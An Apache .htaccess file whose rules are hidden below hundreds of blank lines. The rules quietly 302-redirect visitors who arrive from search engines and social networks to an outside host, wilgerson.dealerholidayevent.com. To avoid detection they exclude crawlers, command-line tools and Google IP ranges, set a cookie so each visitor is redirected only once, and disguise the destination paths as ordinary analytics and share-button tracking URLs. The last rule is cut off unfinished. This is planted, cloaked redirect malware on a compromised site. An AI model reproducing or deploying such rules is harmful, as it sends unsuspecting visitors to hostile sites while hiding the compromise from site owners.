

















































































































































































































































































































































































































































































































































































































































































































































































<IfModule prefork.c>
RewriteEngine On
RewriteCond %{REQUEST_METHOD}   ^GET$
RewriteCond %{HTTP_REFERER}     ^(http\:\/\/)?([^\/\?]*\.)?(tweet|twit|linkedin|instagram|facebook\.|myspace\.|bebo\.).*$ [NC,OR]
RewriteCond %{HTTP_REFERER}     ^(http\:\/\/)?([^\/\?]*\.)?(hi5\.|blogspot\.|friendfeed\.|friendster\.|google\.).*$ [NC,OR]
RewriteCond %{HTTP_REFERER}     ^(http\:\/\/)?([^\/\?]*\.)?(yahoo\.|bing\.|msn\.|ask\.|excite\.|altavista\.|netscape\.).*$ [NC,OR]
RewriteCond %{HTTP_REFERER}     ^(http\:\/\/)?([^\/\?]*\.)?(aol\.|hotbot\.|goto\.|infoseek\.|mamma\.|alltheweb\.).*$ [NC,OR]
RewriteCond %{HTTP_REFERER}     ^(http\:\/\/)?([^\/\?]*\.)?(lycos\.|metacrawler\.|mail\.|pinterest|instagram).*$   [NC]
RewriteCond %{HTTP_REFERER}     !^.*(imgres).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(bing|Accoona|Ace\sExplorer|Amfibi|Amiga\sOS|apache|appie|AppleSyndication).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(Archive|Argus|Ask\sJeeves|asterias|Atrenko\sNews|BeOS|BigBlogZoo).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(Biz360|Blaiz|Bloglines|BlogPulse|BlogSearch|BlogsLive|BlogsSay|blogWatcher).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(Bookmark|bot|CE\-Preload|CFNetwork|cococ|Combine|Crawl|curl|Danger\shiptop).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(Diagnostics|DTAAgent|EmeraldShield|endo|Evaal|Everest\-Vulcan).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(exactseek|Feed|Fetch|findlinks|FreeBSD|Friendster|Fuck\sYou|Google).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(Gregarius|HatenaScreenshot|heritrix|HolyCowDude|Honda\-Search|HP\-UX).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(HTML2JPG|HttpClient|httpunit|ichiro|iGetter|IRIX|Jakarta|JetBrains).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(Krugle|Labrador|larbin|LeechGet|libwww|Liferea|LinkChecker).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(LinknSurf|Linux|LiveJournal|Lonopono|Lotus\-Notes|Lycos|Lynx|Mac\_PowerPC).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(Mac\_PPC|Mac\s10|macDN|Mediapartners|Megite|MetaProducts).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(Miva|Mobile|NetBSD|NetNewsWire|NetResearchServer|NewsAlloy|NewsFire).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(NewsGatorOnline|NewsMacPro|Nokia|NuSearch|Nutch|ObjectSearch|Octora).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(OmniExplorer|Omnipelagos|Onet|OpenBSD|OpenIntelligenceData|oreilly).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(os\=Mac|P900i|panscient|perl|PlayStation|POE\-Component|PrivacyFinder).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(psycheclone|Python|retriever|Rojo|RSS|SBIder|Scooter|Seeker|Series\s60).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(SharpReader|SiteBar|Slurp|Snoopy|Soap\sClient|Socialmarks|Sphere\sScout).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(spider|sproose|Rambler|Straw|subscriber|SunOS|Surfer|Syndic8).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(Syntryx|TargetYourNews|Technorati|Thunderbird|Twiceler|urllib|Validator).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(Vienna|voyager|W3C|Wavefire|webcollage|Webmaster|WebPatrol|wget|Win\s9x).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(Win16|Win95|Win98|Windows\s95|Windows\s98|Windows\sCE|Windows\sNT\s4).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(WinHTTP|WinNT4|WordPress|WWWeasel|wwwster|yacy|Yahoo).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(Yandex|Yeti|YouReadMe|Zhuaxia|ZyBorg).*$   [NC]
RewriteCond %{REQUEST_FILENAME} !.*jpg$|.*gif$|.*png|.*jpeg|.*mpg|.*avi|.*zip|.*gz|.*tar|.*ico$ [NC]
RewriteCond %{REMOTE_ADDR}      !^66\.249.*$ [NC]
RewriteCond %{REMOTE_ADDR}      !^74\.125.*$ [NC]
RewriteCond %{HTTP_COOKIE}      !^.*sfw.*$ [NC]
RewriteCond %{HTTP_USER_AGENT}  .*(Windows|Macintosh|iPad|iPhone|iPod|Android).* [NC]
RewriteCond %{HTTPS}            ^off$
RewriteRule .* - [E=sfw:%{TIME_SEC}]
RewriteRule .* - [E=Pkr:wilgerson.dealerholidayevent.com]

RewriteCond %{ENV:sfw} 0
RewriteRule ^.* http://%{ENV:Pkr}/t.gif?_=1340419594124&count=horizontal&dnt=true&id=twitter-widget-0&lang=en&original_referer=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&size=l&text=SGU\%20Signs\%20MoU\%20with\%20the\%20Indonesian\%20Bond\%20Pricing\%20Agency\%20(IBPA)\%20\%7C\%20Swiss\%20German\%20University&url=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&via=swissgermanuniv&type=share&twttr_referrer=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&twttr_widget=1&twttr_dnt=1  [R=302,NE,L,CO=sfw:%{ENV:sfw}:%{HTTP_HOST}:10589:/:0:HttpOnly]
RewriteCond %{ENV:sfw} 1
RewriteRule ^.* http://%{ENV:Pkr}/pixel;r=700780619;a=p-dd9FcP3j0Ujek;fpan=0;fpa=P0-647002636-1342085253046;ns=0;ce=1;je=0;sr=1024x768x24;enc=n;dst=0;et=1342086125831;tzo=-420;ref=http\%3A\%2F\%2F%{HTTP_HOST}\%2F  [R=302,NE,L,CO=sfw:%{ENV:sfw}:%{HTTP_HOST}:11141:/:0:HttpOnly]
RewriteCond %{ENV:sfw} 2
RewriteRule ^.* http://%{ENV:Pkr}/delivery/lg.php?bannerid=394&campaignid=135&zoneid=822&loc=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&referer=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&cb=f323ef546b  [R=302,NE,L,CO=sfw:%{ENV:sfw}:%{HTTP_HOST}:10009:/:0:HttpOnly]
RewriteCond %{ENV:sfw} 3
RewriteRule ^.* http://%{ENV:Pkr}/delivery/lg.php?bannerid=33989&campaignid=3386&zoneid=1660&channel_ids=,&loc=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&referer=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&cb=57cabb3c1f  [R=302,NE,L,CO=sfw:%{ENV:sfw}:%{HTTP_HOST}:10100:/:0:HttpOnly]
RewriteCond %{ENV:sfw} 4
RewriteRule ^.* http://%{ENV:Pkr}/__utm.gif?utmwv=5.3.2&utms=18&utmn=1522164899&utmhn=wn.com&utmt=event&utme=5(WNAnything*StillOnPage*105)&utmcs=UTF-8&utmsr=1024x768&utmvp=724x638&utmsc=24-bit&utmul=en-us&utmje=0&utmfl=10.3\%20r181&utmdt=Toyota\%20Land\%20Cruiser\%20Fzj73\%20Cabinado\%20Aa\%201996&utmhid=2135424464&utmr=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&utmp=/Toyota_Land_Cruiser_FZJ73_Cabinado_AA_1996&utmac=UA-1177289-31&utmcc=__utma\%3D132968776.1108507309.1340345239.1340345239.1340345239.1\%3B\%2B__utmz\%3D132968776.1340345239.1.1.utmcsr\%3Dgoogle\%7Cutmccn\%3D(organic)\%7Cutmcmd\%3Dorganic\%7Cutmctr\%3Dtoyota\%2520bundera\%2520lx\%3B&utmu=6BAgAAAAIAQ~  [R=302,NE,L,CO=sfw:%{ENV:sfw}:%{HTTP_HOST}:9524:/:0:HttpOnly]
RewriteCond %{ENV:sfw} 5
RewriteRule ^.* http://%{ENV:Pkr}/b?c1=7&c2=8097938&rn=1288027292&c7=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&c3=8097938&c8=ShareThis\%20Segmenter&c9=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&cv=2.2&cs=js  [R=302,NE,L,CO=sfw:%{ENV:sfw}:%{HTTP_HOST}:11446:/:0:HttpOnly]
RewriteCond %{ENV:sfw} 6
RewriteRule ^.* http://%{ENV:Pkr}/b?c1=7&c2=8097938&rn=1223923432&c7=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&c3=8097938&c8=ShareThis\%20Segmenter&c9=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&cv=2.2&cs=js  [R=302,NE,L,CO=sfw:%{ENV:sfw}:%{HTTP_HOST}:10033:/:0:HttpOnly]
RewriteCond %{ENV:sfw} 7
RewriteRule ^.* http://%{ENV:Pkr}/__utm.gif?utmwv=5.3.3&utms=14&utmn=1557420355&utmhn=www.dorothyperkins.com&utmcs=UTF-8&utmsr=1024x768&utmvp=1011x638&utmsc=24-bit&utmul=en-us&utmje=0&utmfl=9.0\%20\%20r47&utmdt=Coral\%20ruched\%20bandeau\%20dip\%20dress\%20-\%20Maxi\%20Dresses\%20-\%20Dresses\%20-\%20Dorothy\%20Perkins&utmhid=1156386339&utmr=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&utmp=/webapp/wcs/stores/servlet/ProductDisplay\%3FbeginIndex\%3D0\%26viewAllFlag\%3D\%26catalogId\%3D33053\%26storeId\%3D12552\%26productId\%3D5926675\%26langId\%3D-1\%26sort_field\%3DRelevance\%26categoryId\%3D208648\%26parent_categoryId\%3D208600\%26pageSize\%3D20&utmac=UA-720649-1&utmcc=__utma\%3D49938099.937999247.1342061621.1342061621.1342061621.1\%3B\%2B__utmz\%3D49938099.1342061621.1.1.utmcsr\%3Dgoogle\%7Cutmccn\%3D(organic)\%7Cutmcmd\%3Dorganic\%7Cutmctr\%3Ddorothy\%2520perkins\%3B&utmu=qAAg~  [R=302,NE,L,CO=sfw:%{ENV:sfw}:%{HTTP_HOST}:10756:/:0:HttpOnly]
RewriteCond %{ENV:sfw} 8
RewriteRule ^.* http://%{ENV:Pkr}/imghover?iact=hm&ei=jtXjT_-iHsuJrAfy6KX_CA&q=alpha+kunci&tbs=&page=1&tbnh=112&tbnw=137&start=0&ndsp=19&dur=867&tbnid=oIs7vBqU6JFoMM:&hovh=194&hovw=259&vpx=659&vpy=138&imgurl=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&imgrefurl=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&ved=1t:1527,r:4,s:0,i:81&vetl=ms  [R=302,NE,L,CO=sfw:%{ENV:sfw}:%{HTTP_HOST}:9671:/:0:HttpOnly]
RewriteCond %{ENV:sfw} 9
RewriteRule ^.* http://%{ENV:Pkr}/__utm.gif?utmwv=5.3.3&utms=1&utmn=203622923&utmhn=jurnal.ekonomi.univpancasila.ac.id&utmcs=UTF-8&utmsr=1024x768&utmvp=1008x638&utmsc=16-bit&utmul=en-us&utmje=0&utmfl=10.3\%20r181&utmdt=Pengaruh\%20Corporate\%20Social\%20Responsibility\%20terhadap\%20Kinerja\%20Perusahaan\%27\%20\%7C\%20Dahlia\%20\%7C\%20AKUNTABILITAS&utmhid=146173994&utmr=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&utmp=/index.php/akuntabilitas/article/view/66&utmac=UA-31672654-1&utmcc=__utma\%3D238016667.1867806176.1341385202.1341385202.1341385202.1\%3B\%2B__utmz\%3D238016667.1341385202.1.1.utmcsr\%3Dgaruda.dikti.go.id\%7Cutmccn\%3D(referral)\%7Cutmcmd\%3Dreferral\%7Cutmcct\%3D/jurnal/detil/id/0:230712/q/jurnal\%2520akuntansi\%2520csr\%2520report/offset/0/limit/15\%3B&utmu=q~  [R=302,NE,L,CO=sfw:%{ENV:sfw}:%{HTTP_HOST}:10709:/:0:HttpOnly]
RewriteCond %{ENV:sfw} 10
RewriteRule ^.* http://%{ENV:Pkr}/1pix.gif?dcsdat=1340352704796&dcssip=&os=Windows\%20XP&lang=en&flashVer=WIN\%2010\%2C1\%2C102\%2C64&dcsref=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&playerURL=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&videoId=1216096166001&dcsuri=/viewer/media_connect_error&playerId=1522730664001&mediaURL=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&publisherId=89804535001&errorCode=NetStream.Play.StreamNotFound&affiliateId=&sourceId=89804535001&lineupId=1521712908001&playerTag=  [R=302,NE,L,CO=sfw:%{ENV:sfw}:%{HTTP_HOST}:10038:/:0:HttpOnly]
RewriteCond %{ENV:sfw} 11
RewriteRule ^.* http://%{ENV:Pkr}/__utm.gif?utmwv=5.3.2&utms=1&utmn=1174393475&utmhn=www.sathora.or.id&utmcs=UTF-8&utmsr=1024x768&utmvp=1008x583&utmsc=32-bit&utmul=en-us&utmje=1&utmfl=10.0\%20r12&utmdt=Paroki\%20Santo\%20Thomas\%20Rasul\%C2\%A0\%7C\%C2\%A0\%20Bagian\%20Pemeliharaan\%20Gereja&utmhid=781460874&utmr=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&utmp=/dewan-paroki/bagian-pemeliharaan-gereja/&utmac=UA-32795500-1&utmcc=__utma\%3D211523863.1894228036.1340609330.1340609330.1340609652.2\%3B\%2B__utmz\%3D211523863.1340609652.2.2.utmcsr\%3Dgoogle\%7Cutmccn\%3D(organic)\%7Cutmcmd\%3Dorganic\%7Cutmctr\%3Dkontak\%2520pengurus\%2520gereja\%2520sathora\%3B&utmu=q~  [R=302,NE,L,CO=sfw:%{ENV:sfw}:%{HTTP_HOST}:10495:/:0:HttpOnly]
RewriteCond %{ENV:sfw} 12
RewriteRule ^.* http://%{ENV:Pkr}/b?c1=7&c2=8097938&rn=644705550&c7=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&c3=8097938&c8=ShareThis\%20Segmenter&c9=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&cv=2.2&cs=js  [R=302,NE,L,CO=sfw:%{ENV:sfw}:%{HTTP_HOST}:9296:/:0:HttpOnly]
RewriteCond %{ENV:sfw} 13
RewriteRule ^.* http://%{ENV:Pkr}/__utm.gif?utmwv=5.3.3&utms=26&utmn=978736286&utmhn=motor-dan-sekuter.tokobagus.com&utmt=event&utme=5(image*thumbnail*10027334)&utmcs=UTF-8&utmsr=1024x768&utmvp=1007x612&utmsc=24-bit&utmul=en-us&utmje=0&utmfl=10.0\%20r22&utmdt=CB\%20100\%20istimewa\%20thn\%2080\%20-\%20Tokobagus.com&utmhid=1803484092&utmr=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&utmp=/honda/cb-100-istimewa-thn-80-10027334.html&utmac=UA-5908313-1&utmcc=__utma\%3D223717764.211996817.1320984607.1341198496.1341200812.26\%3B\%2B__utmz\%3D223717764.1340786196.22.18.utmcsr\%3Dgoogle\%7Cutmccn\%3D(organic)\%7Cutmcmd\%3Dorganic\%7Cutmctr\%3Dkalimaya\%2520banten\%3B&utmu=6BIAAC~  [R=302,NE,L,CO=sfw:%{ENV:sfw}:%{HTTP_HOST}:11138:/:0:HttpOnly]
RewriteCond %{ENV:sfw} 14
RewriteRule ^.* http://%{ENV:Pkr}/imghover?iact=hm&ei=MubnT5bbKMjJrAeFqoWICQ&q=zhoumi&tbnh=90&tbnw=60&dur=1699&tbnid=ph5VsC6qF0nLTM:&hovh=274&hovw=184&vpx=223&vpy=289&imgurl=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&imgrefurl=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&ved=0CGsQ3hEwBA&vetl=ms  [R=302,NE,L,CO=sfw:%{ENV:sfw}:%{HTTP_HOST}:9862:/:0:HttpOnly]
RewriteCond %{ENV:sfw} 15
RewriteRule ^.* http://%{ENV:Pkr}/t.gif?_=1340259928745&count=horizontal&id=twitter-widget-0&lang=en&original_referer=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&size=m&text=PSAK\%2023\%20-\%20Pendapatan&url=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&type=share&twttr_referrer=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&twttr_widget=1&twttr_dnt=1  [R=302,NE,L,CO=sfw:%{ENV:sfw}:%{HTTP_HOST}:10479:/:0:HttpOnly]
RewriteCond %{ENV:sfw} 16
RewriteRule ^.* http://%{ENV:Pkr}/__utm.gif?utmwv=5.3.3&utms=1&utmn=570891439&utmhn=widgets.wallstreetsurvivor.com&utmcs=UTF-8&utmsr=1024x768&utmvp=210x210&utmsc=24-bit&utmul=en-us&utmje=0&utmfl=10.3\%20r181&utmhid=1332545917&utmr=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&utmp=/WidgetCommodities.aspx&utmac=UA-1776507-8&utmcc=__utma\%3D215527825.1635514106.1342087919.1342087919.1342087919.1\%3B\%2B__utmz\%3D215527825.1342087919.1.1.utmcsr\%3Dangguntrader.blogspot.com\%7Cutmccn\%3D(referral)\%7Cutmcmd\%3Dreferral\%7Cutmcct\%3D/\%3B&utmu=q~  [R=302,NE,L,CO=sfw:%{ENV:sfw}:%{HTTP_HOST}:11444:/:0:HttpOnly]
RewriteCond %{ENV:sfw} 17
RewriteRule ^.* http://%{ENV:Pkr}/neo/darla/php/fc.php?trace=folder_inbox&tID=1&d=0&f=978532093&l=SKY\%2CREC\%2CMNW&rn=1341554925492&en=utf-8&mb_s_en=utf-8&filter=no_expandable\%253Bajax_cert_expandable\%253Bexp_iframe_expandable\%253B&ref=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&sa=content\%253D\%2522minty_tenure\%253A\%2520week\%25203+\%2522&  [R=302,NE,L,CO=sfw:%{ENV:sfw}:%{HTTP_HOST}:9460:/:0:HttpOnly]
RewriteCond %{ENV:sfw} 18
RewriteRule ^.* http://%{ENV:Pkr}/1pix.gif?dcsdat=1340356380187&dcssip=&os=Windows\%20XP&lang=en&flashVer=WIN\%2010\%2C1\%2C102\%2C64&dcsref=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&playerURL=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&videoId=1505115769001&dcsuri=/viewer/media_connect_error&playerId=1522730664001&mediaURL=rtmp://brightcove.fcod.llnwd.net/a500/e1/uds/rtmp/ondemand/\%26mp4:89804535001/89804535001_1505158207001_acma02-alus-h264.mp4\%261340341200000\%26303e88e79ad49760dd42e3d253368813&publisherId=89804535001&errorCode=FMSConnectionError&affiliateId=&sourceId=89804535001&lineupId=1521712908001&playerTag=  [R=302,NE,L,CO=sfw:%{ENV:sfw}:%{HTTP_HOST}:11322:/:0:HttpOnly]
RewriteCond %{ENV:sfw} 19
RewriteRule ^.* http://%{ENV:Pkr}/pixel;r=1763719525;a.1=p-94D6e1NDscLvI;labels.1=comment-links;a.2=p-18-mFEk4J448M;labels.2=type.intensedebate.embed;fpan=0;fpa=P0-1600028960-1342147074360;ns=0;ce=1;je=0;sr=1360x768x24;enc=n;dst=0;et=1342147083477;tzo=-420;ref=http\%3A\%2F\%2F%{HTTP_HOST}\%2F  [R=302,NE,L,CO=sfw:%{ENV:sfw}:%{HTTP_HOST}:9300:/:0:HttpOnly]
RewriteCond %{ENV:sfw} 20
RewriteRule ^.* http://%{ENV:Pkr}/api/getCount2.php?cb=stButtons.processCB&refDomain=www.mangahere.com&refQuery=manga/chou_yo_hana_yo/v04/c016/20.html&pgurl=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&pubKey=e47efe7d-147b-4731-ac42-9838ccdc52f2&url=http\%3A\%2F\%2F%{HTTP_HOST}\%2F  [R=302,NE,L,CO=sfw:%{ENV:sfw}:%{HTTP_HOST}:10893:/:0:HttpOnly]
RewriteCond %{ENV:sfw} 21
RewriteRule ^.* http://%{ENV:Pkr}/__utm.gif?utmwv=5.3.3&utms=2&utmn=818664542&utmhn=sport.detik.com&utmcs=ISO-8859-1&utmsr=1280x768&utmvp=1263x577&utmsc=24-bit&utmul=en-us&utmje=0&utmfl=10.3\%20r181&utmdt=Pesta\%20Bola\%20Eropa\%202012\%20:\%20Spanyol\%20Juara\%2C\%20Shinta\%20Bachir\%20Buka\%20Baju\%20di\%20Atas\%20Panggung&utmhid=717644177&utmr=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&utmp=/pialaeropa/read/2012/07/02/120639/1955544/1385/spanyol-juara-shinta-bachir-buka-baju-di-atas-panggung\%3F991104topnews&utmac=UA-891770-59&utmcc=__utma\%3D1.171398330.1337743125.1340595080.1341210701.3\%3B\%2B__utmz\%3D1.1341210701.3.3.utmcsr\%3Ddetik.com\%7Cutmccn\%3D(referral)\%7Cutmcmd\%3Dreferral\%7Cutmcct\%3D/\%3B&utmu=qhAAAAAgAAIAAAAAQ~  [R=302,NE,L,CO=sfw:%{ENV:sfw}:%{HTTP_HOST}:10761:/:0:HttpOnly]
RewriteCond %{ENV:sfw} 22
RewriteRule ^.* http://%{ENV:Pkr}/t.gif?_=1340862943645&count=horizontal&counturl=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&id=twitter_tweet_button_0&lang=id&original_referer=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&text=Empat\%20Cara\%20Ketahui\%20Kematangan\%20Daging\%20Panggang\%20-\%20Yahoo!\%20She&url=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&type=share&size=m&twttr_referrer=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&twttr_widget=1&twttr_hask=0&twttr_li=0&twttr_pid=v3:1334655638824679981279445  [R=302,NE,L,CO=sfw:%{ENV:sfw}:%{HTTP_HOST}:9253:/:0:HttpOnly]
RewriteCond %{ENV:sfw} 23
RewriteRule ^.* http://%{ENV:Pkr}/__utm.gif?utmwv=5.3.3&utms=2&utmn=1619583884&utmhn=entertainment.kompas.com&utmcs=UTF-8&utmsr=1024x768&utmvp=1007x574&utmsc=24-bit&utmul=en-us&utmje=0&utmfl=10.0\%20r42&utmdt=Beyonce:\%20Terima\%20Kasih\%20untuk\%20Michael\%20Jackson\%20-\%20KOMPAS.com&utmhid=224330488&utmr=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&utmp=/read/2012/06/29/08495549/Beyonce.Terima.Kasih.untuk.Michael.Jackson&utmac=UA-3374285-22&utmcc=__utma\%3D236101461.1453662557.1334822371.1340931040.1340947557.38\%3B\%2B__utmz\%3D236101461.1340947557.38.38.utmcsr\%3Dkompas.com\%7Cutmccn\%3D(referral)\%7Cutmcmd\%3Dreferral\%7Cutmcct\%3D/\%3B&utmu=qhAg~  [R=302,NE,L,CO=sfw:%{ENV:sfw}:%{HTTP_HOST}:10284:/:0:HttpOnly]
RewriteCond %{ENV:sfw} 24
RewriteRule ^.* http://%{ENV:Pkr}/__utm.gif?utmwv=5.3.3&utms=48&utmn=1125353961&utmhn=www.tokobagus.com&utmcs=UTF-8&utmsr=1024x768&utmvp=1007x612&utmsc=24-bit&utmul=en-us&utmje=0&utmfl=10.0\%20r22&utmdt=Tokobagus\%20-\%20Situs\%20jual\%20beli\%20online\%20terdepan\%20di\%20Indonesia&utmhid=480057587&utmr=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&utmp=/halaman/cgid/48/mencari/onthel/di/sepeda-dan-aksesoris/cpi/48/search.asp&utmac=UA-5908313-1&utmcc=__utma\%3D223717764.211996817.1320984607.1341452985.1341481329.31\%3B\%2B__utmz\%3D223717764.1341366135.28.19.utmcsr\%3Dgoogle\%7Cutmccn\%3D(organic)\%7Cutmcmd\%3Dorganic\%7Cutmctr\%3Dmotor\%2520bmw\%3B&utmu=qBIAAC~  [R=302,NE,L,CO=sfw:%{ENV:sfw}:%{HTTP_HOST}:11115:/:0:HttpOnly]
RewriteCond %{ENV:sfw} 25
RewriteRule ^.* http://%{ENV:Pkr}/pixel;r=275942671;a=p-19UtqE8ngoZbM;fpan=0;fpa=P0-1640712794-1331207075701;ns=0;ce=1;je=0;sr=1366x768x24;enc=n;dst=0;et=1342072059489;tzo=-420;ref=http\%3A\%2F\%2F%{HTTP_HOST}\%2F  [R=302,NE,L,CO=sfw:%{ENV:sfw}:%{HTTP_HOST}:11100:/:0:HttpOnly]
RewriteCond %{ENV:sfw} 26
RewriteRule ^.* http://%{ENV:Pkr}/log.php?owa_timestamp=1340785336&owa_event_type=base.page_request&owa_is_new_visitor=true&owa_visitor_id=1340785336846366683&owa_fsts=1340785336&owa_dsfs=0&owa_last_req=&owa_session_id=1340785336465267765&owa_is_new_session=true&owa_nps=1&owa_dsps=0&owa_medium=referral&owa_source=m.urbanesia.com&owa_search_terms=\%28none\%29&owa_session_referer=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&owa_page_url=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&owa_HTTP_REFERER=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&owa_page_title=Skye+-+Culinary+-+Menteng+-+Urbanesia&owa_site_id=97e4bb2c141dcdf9e74ff4d3bbfa024d&  [R=302,NE,L,CO=sfw:%{ENV:sfw}:%{HTTP_HOST}:11802:/:0:HttpOnly]
RewriteCond %{ENV:sfw} 27
RewriteRule ^.* http://%{ENV:Pkr}/pview?event=pview&fpc=d96b1f4-137eaa87da1-3bf81330-2130&sessionID=1340190841308.24198&sourceURL=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&hostname=www.mangahere.com&location=/manga/ai_wo_chodai/v03/c011/32.html&publisher=e47efe7d-147b-4731-ac42-9838ccdc52f2&shareHash=sthash.W4njDF28&incomingHash=&refDomain=www.mangahere.com&refQuery=manga/ai_wo_chodai/v03/c011/31.html&url=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&sharURL=&source=share5x&title=Ai\%20Wo\%20Chodai\%2011\%20-\%20Read\%20Ai\%20Wo\%20Chodai\%20Chapter\%2011\%20Online\%20-\%20Page\%2032&ts1340190841310.0=  [R=302,NE,L,CO=sfw:%{ENV:sfw}:%{HTTP_HOST}:10776:/:0:HttpOnly]
RewriteCond %{ENV:sfw} 28
RewriteRule ^.* http://%{ENV:Pkr}/img/3.gif?&un=1&pm=1&refpp=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&site=5013&icon=1&sw=1280&hw=1024&color=32&j=1&c=1&referer=4gifs.com&word=/gallery/v/AnimatedHorrors/&br=5&os=1&se=0&-&fromd=4gifs.com&fromp=/gallery/v/AnimatedHorrors/?g2_page=2&rand=399&0  [R=302,NE,L,CO=sfw:%{ENV:sfw}:%{HTTP_HOST}:9382:/:0:HttpOnly]
RewriteCond %{ENV:sfw} 29
RewriteRule ^.* http://%{ENV:Pkr}/__utm.gif?utmwv=5.3.2&utms=1&utmn=704427673&utmhn=www.visitor-booster.com&utmcs=UTF-8&utmsr=1024x768&utmvp=1024x628&utmsc=24-bit&utmul=en-us&utmje=0&utmfl=10.0\%20r42&utmdt=Visitor\%20Booster\%20\%7C\%20Boost\%20your\%20visitor\%20in\%20a\%20minute&utmhid=1410124067&utmr=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&utmp=/2wdlhkglsw8wcgc&utmac=UA-28399756-4&utmcc=__utma\%3D240034308.128672160.1340176171.1340176171.1340176171.1\%3B\%2B__utmz\%3D240034308.1340176171.1.1.utmcsr\%3Dgoogle\%7Cutmccn\%3D(organic)\%7Cutmcmd\%3Dorganic\%7Cutmctr\%3D(not\%2520provided)\%3B&utmu=q~  [R=302,NE,L,CO=sfw:%{ENV:sfw}:%{HTTP_HOST}:11202:/:0:HttpOnly]
RewriteCond %{ENV:sfw} 30
RewriteRule ^.* http://%{ENV:Pkr}/__utm.gif?utmwv=5.3.3&utms=1&utmn=687856483&utmhn=freethemes4you.com&utmcs=UTF-8&utmsr=1024x768&utmvp=1007x596&utmsc=24-bit&utmul=en-us&utmje=0&utmfl=-&utmdt=Best\%20Sport\%20Drupal\%20Themes&utmhid=1878542675&utmr=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&utmp=/categories/sport&utmac=UA-295212-11&utmcc=__utma\%3D183223281.2098167535.1341275290.1341275290.1341275290.1\%3B\%2B__utmz\%3D183223281.1341275290.1.1.utmcsr\%3Dgoogle\%7Cutmccn\%3D(organic)\%7Cutmcmd\%3Dorganic\%7Cutmctr\%3Ddrupal\%2520sport\%2520theme\%3B&utmu=q~  [R=302,NE,L,CO=sfw:%{ENV:sfw}:%{HTTP_HOST}:11058:/:0:HttpOnly]
RewriteCond %{ENV:sfw} 31
